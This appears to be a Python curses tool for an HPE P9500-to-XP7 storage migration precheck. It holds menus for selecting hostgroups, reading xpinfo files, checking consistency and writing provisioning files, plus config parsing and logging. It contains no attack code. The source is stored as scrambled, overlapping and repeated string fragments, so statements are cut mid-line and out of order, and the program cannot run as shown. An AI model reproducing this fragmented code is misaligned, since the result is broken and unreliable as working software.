"{} - {}, executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]:",
"self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice up to {}-{}\".format(self.slice_start,self.slice_end )) elif n > 0:",
"self.slice_start < 0: self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len elif n",
"len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate :: position = {}, n = {}\".format(self.position,n )) ###",
"line[:self.width-1] ### only add lines in the slice ### if self.slice_start <= index",
"__init__(self,window,selection,consistent,stdscr): self.window = window self.selection = selection self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels()",
"### self.slice_start = 0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start + self.slice_len self.window.keypad(1)",
"break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.xpinfo_file_list) - 1: break else:",
"to {}-{}\".format(self.slice_start,self.slice_end )) def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh()",
"logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE",
"= site_dict[box_name] else: err_msg = \"No site defined for box {}, exiting..\".format(box_name) logger.error(err_msg)",
"self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth - 6) self.slice_start = 0 self.slice_end = self.slice_start +",
"self.selection = selection self.hostgroup_summary = [] self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list",
"Add xpinfo file processing CONFIG : xpmig.ini LOG : xpmig_precheck.log TODO : add",
"self.slice_end > len(self.display_list) - 1: self.slice_end = len(self.display_list) - 1 self.slice_start = self.slice_end",
"err_msg = \"No site defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\")",
"### show the list of xpinfo files ### for index,item in enumerate(self.xpinfo_file_list): if",
"- 1 self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.update()",
"items which fits in the window ### self.slice_start = 0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6)",
"self.position < 2 and self.slice_end < len(self.xpinfo_file_list) - 1: ### slide slice down",
"window self.heigth,self.width = self.window.getmaxyx() self.xpinfo_file_list =[] self.slice_start = 0 self.slice_len = 0 self.slice_end",
"navigate(self,n): self.position += n if self.position < 0: self.position = 0 elif self.position",
"### slice is a view on the items which fits in the window",
"= Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ### define consistent_win ### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent =",
"in hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu =",
"in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\")) > 1: sel_item = hba_wwn.nickname.split(\"_\")[0] else: sel_item = hba_wwn.nickname",
"self.display_list = [] for box_name,hostgroup_name in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO: add CA",
"items list to match the new search criteria \"\"\" if self.search.get() != \"\":",
"got S/N {} LDEV {} from xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr)",
"HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups by name ### select_item_dict = {} for boxpair_name in",
"found hostgroups to the selection ### for box_name in hostgroup_dict: for hostgroup_name in",
"in enumerate(self.display_list): if len(item) >= self.width: item = item[:self.width-1] if self.slice_start <= index",
"\"\": logger.debug(\"Select_Menu.update :: update items to match search str {}\".format(self.search.get())) self.filtered_items = [x",
"cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file dir not defined, exiting..\\n\") sys.exit(1) serial_to_name_dict = {} for",
"= [f for f in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len =",
"if self.position - self.slice_start < 2 and self.slice_start >= 1: ### slide slice",
"- self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice down to {}-{}\".format(self.slice_start,self.slice_end )) def display(self): self.panel.top()",
"add lines in the slice ### # logger.debug(\"SelectMenu.display :: about to addstr line",
"== self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL # line = \"{}:",
"check window heigth and width ### if curses.COLS < 20 or curses.LINES <",
"in serial_nbr_set: ldev_dict[serial_nbr] = set() ### process the selected xpinfo file ### with",
"window self.heigth,self.width = self.window.getmaxyx() self.title = title self.selection = [] def display(self): self.window.clear()",
"= value try: log_level = cfg.getint(\"log\",\"level\") except: log_level = 30 try: log_size =",
"self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.selection) current_set.add(item) self.selection = list(sorted(current_set))",
"UP <ARROW-DOWN or PAGE-DOWN> SCROLL DOWN <B> BACK\",curses.A_BOLD) ### define menu_win ### menu_win",
"to display ### self.slice_start = 0 self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start +",
"* linelen) logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\" * linelen) logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR :\")",
"line[:self.width-1] self.window.addstr(1+index,2,line,mode) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position == len(self.items)",
"self.selection = selection self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] self.consistent",
"ldevs to file ### for box_name,hostgroup_name in self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name))",
">= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate() self.reply = self.window.getstr() ###",
"key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if",
"hostgroup_name in hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu",
"self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]:",
"1: self.slice_end += n if self.slice_end > len(self.display_list) - 1: self.slice_end = len(self.display_list)",
"define consistent_win ### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ### define",
"= \"\" self.update_object = upd_obj def display(self): self.panel.top() self.panel.show() self.window.clear() line = \"{}:",
"self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate() self.reply = self.window.getstr() ### after we received the response",
"self.filtered_items.append(\"exit\") ### slice is a view on the items which fits in the",
"self.panel.hide() panel.update_panels() curses.doupdate() #################################################################################################### ### MAIN #################################################################################################### def main(stdscr): ### clear screen ###",
"import curses from curses import panel import re import logging import logging.handlers import",
"### ######################### for box_name in collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if box_name in instance_dict:",
"hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr)",
"def __init__(self,window,selection,consistent,stdscr): self.window = window self.selection = selection self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide()",
"### key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP> SCROLL UP <ARROW-DOWN",
"= panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.items = items self.items.append((\"exit\",\"exit\")) def navigate(self,n):",
"len(self.items): self.position = len(self.items) - 1 def display(self): self.panel.top() self.panel.show() self.window.clear() while True:",
"in cfg.items(\"collect\"): collectfile_dict[name.upper()] = value try: log_level = cfg.getint(\"log\",\"level\") except: log_level = 30",
"from curses import panel import re import logging import logging.handlers import copy from",
"== curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif key == curses.KEY_PPAGE: self.navigate(-10)",
"for x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)] else: logger.debug(\"Select_Menu.update :: update items to match",
"to file ### for box_name,hostgroup_name in self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with",
"window self.heigth,self.width = self.window.getmaxyx() self.title = title self.search_str = \"\" def display(self): self.window.clear()",
"= \"No HORCM instance nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg +",
"= serialnbr_dict[box_name] else: err_msg = \"No serial nbr defined for box {}, exiting..\".format(box_name)",
"self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.items",
"== curses.KEY_DOWN: self.navigate(1) elif key == curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10)",
"= stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border() main_menu_items = [] input_search = InputMenu(menu_win,\"Specify new search string\",search,stdscr)",
"self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class InputMenu(object): def",
"panel.update_panels() curses.doupdate() class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1)",
"in enumerate(self.items): if index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL",
"InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window)",
"self.xpinfo_file_list = [f for f in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len",
"self.window.getmaxyx() ### fill the list to display ### self.display_list = [] for box_name,hostgroup_name",
"logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\"",
"### FUNCTIONS #################################################################################################### #################################################################################################### ### CLASSES #################################################################################################### class Menu(object): def __init__(self,window,items,stdscr): self.window =",
"clear(self): del self.selection[:] self.display() def get(self): return self.selection class Search(object): def __init__(self,window,title,stdscr): self.window",
"= self.slice_start + self.slice_len while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.display_list):",
"curses.A_STANDOUT else: mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item[0]) line = \"{}\".format(item[0])",
"### start menu ### ##################### curses.wrapper(main) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK ended\") logger.info(\"#\"",
"key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.xpinfo_file_list) - 1: break else: logger.debug(\"XPINFO: start",
"logger.error(\"XPINFO: line too short to be valid, skipping {}\".format(row)) ### translate ldev to",
"5 try: log_dir = cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file dir not defined, exiting..\\n\") sys.exit(1)",
"the response ### self.update_object.set(self.reply) self.window.clear() self.panel.hide() panel.update_panels() curses.noecho() curses.doupdate() class Selection(object): def __init__(self,window,title,stdscr):",
"self.display_list = [] def navigate(self,n): if n < 0: if self.slice_start >= 1:",
"key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif key == curses.KEY_UP: self.navigate(-1)",
"define selection_win ### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ### define",
"self.window = window self.heigth,self.width = self.window.getmaxyx() self.selection = selection self.hostgroup_summary = [] self.window.keypad(1)",
"if self.slice_start >= 1: self.slice_start += n if self.slice_start < 0: self.slice_start =",
"self.search_str = search_str self.display() def clear(self): self.search_str = \"\" self.display() def get(self): return",
"= curses.A_STANDOUT else: mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item) line =",
"panel.update_panels() self.position = 0 self.selection = selection self.search = search def update(self): \"\"\"",
"in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section): sys.stderr(\"{} section missing in config file {}, exiting..\".format(mandatory_section,configfile))",
"self.slice_start + self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice up to {}-{}\".format(self.slice_start,self.slice_end )) elif n",
"= consistent self.map_dir = map_dir self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() def display(self):",
"= window self.heigth,self.width = self.window.getmaxyx() ### items is a dict ### self.items =",
"site defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) box_dict[box_name] =",
"for name,value in cfg.items(\"collect\"): collectfile_dict[name.upper()] = value try: log_level = cfg.getint(\"log\",\"level\") except: log_level",
"slide slice down to {}-{}\".format(self.slice_start,self.slice_end )) def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while",
"self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.items = items",
"P9500 TO XP7 MIGRATION PRE-CHECK\") title_win.border() ### define search_win ### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0)",
"not large enough, exiting ..\\n\") sys.exit(1) ### define title_win ### title_win = stdscr.subwin(3,curses.COLS,0,0)",
"NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) ######################### ### instantiate boxes ###",
"mode = curses.A_STANDOUT else: mode = curses.A_NORMAL line = \"{}\".format(item) if len(line) >=",
"MAIN #################################################################################################### def main(stdscr): ### clear screen ### stdscr.clear() ### check window heigth",
"os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list = [f for f in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)]",
"n if self.slice_end > len(self.display_list) - 1: self.slice_end = len(self.display_list) - 1 self.slice_start",
"in site_dict: site = site_dict[box_name] else: err_msg = \"No site defined for box",
"def add(self,item): current_set = set(self.consistent) current_set.add(item) self.consistent = list(sorted(current_set)) self.display() def clear(self): del",
"self.window.clear() line = \"{}: {}\".format(self.title,self.search_str) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line)",
"= line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate() self.reply = self.window.getstr() ### after we received",
"logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) #########################",
"HOSTGROUPs summary\",hostgroup_summary.display)) ### show hostgroup consistency menu ### hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs",
"self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.selection) current_set.add(item) self.selection = list(sorted(current_set)) self.display() def",
"ldev to hostgroup ### for serial_nbr in ldev_dict: box_name = serial_to_name_dict[serial_nbr] if not",
"index <= self.slice_end: # logger.debug(\"SelectMenu.display :: index in slice {} - {}, executing",
"self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window = window self.selection =",
"class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window = window self.consistent = consistent self.map_dir = map_dir",
"if self.slice_end > len(self.xpinfo_file_list) - 1: self.slice_end = len(self.xpinfo_file_list) - 1 self.slice_start =",
"sys.exit(1) if box_name in site_dict: site = site_dict[box_name] else: err_msg = \"No site",
"### only add lines in the slice ### # logger.debug(\"SelectMenu.display :: about to",
"{}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] = value.split(\",\") for name,value in",
"TITLE : HPE XP7 Migration, Precheck DESCRIPTION : Precheck to examine hostgroup is",
"selection_win ### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ### define consistent_win",
"items self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ### slice is a view on the items",
"the ldevs to file ### for box_name,hostgroup_name in self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf =",
"= title self.search_str = \"\" def display(self): self.window.clear() line = \"{}: {}\".format(self.title,self.search_str) if",
"SCROLL DOWN <B> BACK\",curses.A_BOLD) ### define menu_win ### menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border()",
"to {}-{}\".format(self.slice_start,self.slice_end )) elif n > 0: if self.slice_end - self.position < 2",
"### now we know what to display ### self.slice_start = 0 self.slice_len =",
">= self.width: line = line[:self.width-1] self.window.addstr(1+index,2,line,mode) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]:",
"#################################################################################################### \"\"\" import curses from curses import panel import re import logging import",
"logging import logging.handlers import copy from ConfigParser import ConfigParser import sys import os",
"self.width: line = line[:self.width-1] ### only add lines in the slice ### #",
":\".format(box_name)) logger.info(box_dict[box_name]) ##################### ### start menu ### ##################### curses.wrapper(main) logger.info(\"#\" * linelen) logger.info(\"XPMIG",
"= stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP> SCROLL UP <ARROW-DOWN or PAGE-DOWN>",
"= [] for box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we know what to",
"the list of xpinfo files ### for index,item in enumerate(self.xpinfo_file_list): if index ==",
"{} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ### select hostgroups by host (hba_wwn) ### select_item_dict = {} for",
"{} box_dict = {} #################################################################################################### ### FUNCTIONS #################################################################################################### #################################################################################################### ### CLASSES #################################################################################################### class",
"xpmig.ini LOG : xpmig_precheck.log TODO : add generate temporary horcm file and daemon",
"to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not added to consistent",
"for boxpair_name in sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name",
"logger.debug(\"Select_Menu.update :: update items to match search all\") self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start",
"valid, skipping {}\".format(row)) ### translate ldev to hostgroup ### for serial_nbr in ldev_dict:",
"we know what to display ### self.slice_start = 0 self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end",
"define key_win ### key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP> SCROLL",
"0 self.slice_len = 0 self.slice_end = 0 self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels()",
"FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) ######################### ### instantiate boxes ### ######################### for box_name",
"panel.update_panels() self.position = 0 self.xpinfo_dir = xpinfo_dir self.selection = selection def update(self): \"\"\"",
"logger.debug(\"Select_Menu.update :: update items to match search str {}\".format(self.search.get())) self.filtered_items = [x for",
"### show hostgroup consistency menu ### hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs consistency check",
"6) self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len self.position = 0 def",
"= copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len self.position =",
"len(self.filtered_items) - 1: self.slice_end = len(self.filtered_items) - 1 self.slice_start = self.slice_end - self.slice_len",
"XPINFO file ### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ### show hostgroup summary",
"translate ldev to hostgroup ### for serial_nbr in ldev_dict: box_name = serial_to_name_dict[serial_nbr] if",
"self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ### slice is a view on the items which",
"= {} for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list:",
"main_menu.display() ### refresh & wait ### stdscr.refresh() stdscr.getkey() #################### ### parse config ###",
"screen ### stdscr.clear() ### check window heigth and width ### if curses.COLS <",
"{} for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: if",
"self.slice_start += n if self.slice_start < 0: self.slice_start = 0 self.slice_end = self.slice_start",
"consistency menu ### hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs consistency check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP",
"value.split(\",\") for name,value in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] = int(value) for name,value in cfg.items(\"instance\"): instance_dict[name.upper()]",
"slice up ### self.slice_start += n if self.slice_start < 0: self.slice_start = 0",
"self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.filtered_items): if index",
"self.search_str class Consistent(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title =",
"sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in site_dict: site = site_dict[box_name] else: err_msg",
"check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name)) ### now we know what to display",
"menu ### hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs consistency check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear))",
"1.3 Add config file 2.0 Consistency check update 2.1 Add xpinfo file processing",
"self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() #################################################################################################### ### MAIN #################################################################################################### def main(stdscr): ### clear screen",
"\"\" def display(self): self.window.clear() line = \"{}: {}\".format(self.title,self.search_str) if len(line) >= self.width: line",
"in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ###",
"file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh & wait ### stdscr.refresh() stdscr.getkey() ####################",
"box_name in serialnbr_dict: serial_nbr = serialnbr_dict[box_name] else: err_msg = \"No serial nbr defined",
"csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in xpinfo_file_reader: if len(row) > 8: hostname = row[0] device_name",
"elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr):",
"0: self.position = 0 elif self.position >= len(self.filtered_items): self.position = len(self.filtered_items) - 1",
"### self.slice_start = 0 self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start + self.slice_len while",
"= self.window.getstr() ### after we received the response ### self.update_object.set(self.reply) self.window.clear() self.panel.hide() panel.update_panels()",
"if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\")",
"criteria \"\"\" if self.search.get() != \"\": logger.debug(\"Select_Menu.update :: update items to match search",
"line = line[:self.width-1] ### only add lines in the slice ### # logger.debug(\"SelectMenu.display",
"set() for ldev_nbr in ldev_dict[serial_nbr]: for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add found",
"#################### ### parse config ### #################### configfile = \"xpmig.ini\" cfg = ConfigParser() cfg.read(configfile)",
"{}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in serialnbr_dict: serial_nbr =",
"selection self.search = search def update(self): \"\"\" update the selection items list to",
"0: if self.slice_end - self.position < 2 and self.slice_end < len(self.xpinfo_file_list) - 1:",
"select hostgroups by host (hba_wwn) ### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()):",
"elif n > 0: if self.slice_end < len(self.display_list) - 1: self.slice_end += n",
"sys.stderr.write(\"map file dir not defined, exiting..\\n\") sys.exit(1) serial_to_name_dict = {} for box_name,serial_nbr in",
"lines in the slice ### # logger.debug(\"SelectMenu.display :: about to addstr line {}\".format(line))",
"self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.selection)",
"self.text = text self.reply = \"\" self.update_object = upd_obj def display(self): self.panel.top() self.panel.show()",
"self.window.refresh() curses.doupdate() ### show the list of xpinfo files ### for index,item in",
"> len(self.filtered_items) - 1: self.slice_end = len(self.filtered_items) - 1 self.slice_start = self.slice_end -",
"row in xpinfo_file_reader: if len(row) > 8: hostname = row[0] device_name = row[1]",
"hostname = row[0] device_name = row[1] ldev_nbr = xp7.standard_format_ldev(row[5]) serial_nbr = int(row[8]) logger.debug(\"XPINFO:",
"else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_Menu(object): def __init__(self,window,items,selection,search,stdscr): self.window = window",
"log_size = 100000000 try: log_versions = cfg.getint(\"log\",\"maxversions\") except: log_versions = 5 try: log_dir",
"self.width: line = line[:self.width-1] ### only add lines in the slice ### if",
"name ### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]:",
"Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ### define key_win ### key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate()",
"ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N, added to ldev_dict, now at {} elements\".format(len(ldev_dict[serial_nbr]))) else:",
"HOSTGROUP\",hg_by_name_menu.display)) ### read XPINFO file ### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ###",
"ldev_nbr = xp7.standard_format_ldev(row[5]) serial_nbr = int(row[8]) logger.debug(\"XPINFO: got S/N {} LDEV {} from",
"self.update_object.set(self.reply) self.window.clear() self.panel.hide() panel.update_panels() curses.noecho() curses.doupdate() class Selection(object): def __init__(self,window,title,stdscr): self.window = window",
"collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if box_name in instance_dict: instance_nbr = instance_dict[box_name] else: err_msg =",
"= search_str self.display() def clear(self): self.search_str = \"\" self.display() def get(self): return self.search_str",
"self.display() def clear(self): del self.selection[:] self.display() def get(self): return self.selection class Search(object): def",
": Precheck to examine hostgroup is ready for migration AUTHOR : <NAME> /",
"self.slice_len while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.display_list): if len(item) >=",
"box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set()",
"try: map_dir = cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file dir not defined, exiting..\\n\") sys.exit(1) serial_to_name_dict",
"self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() ### show the list of xpinfo",
"__init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.consistent = []",
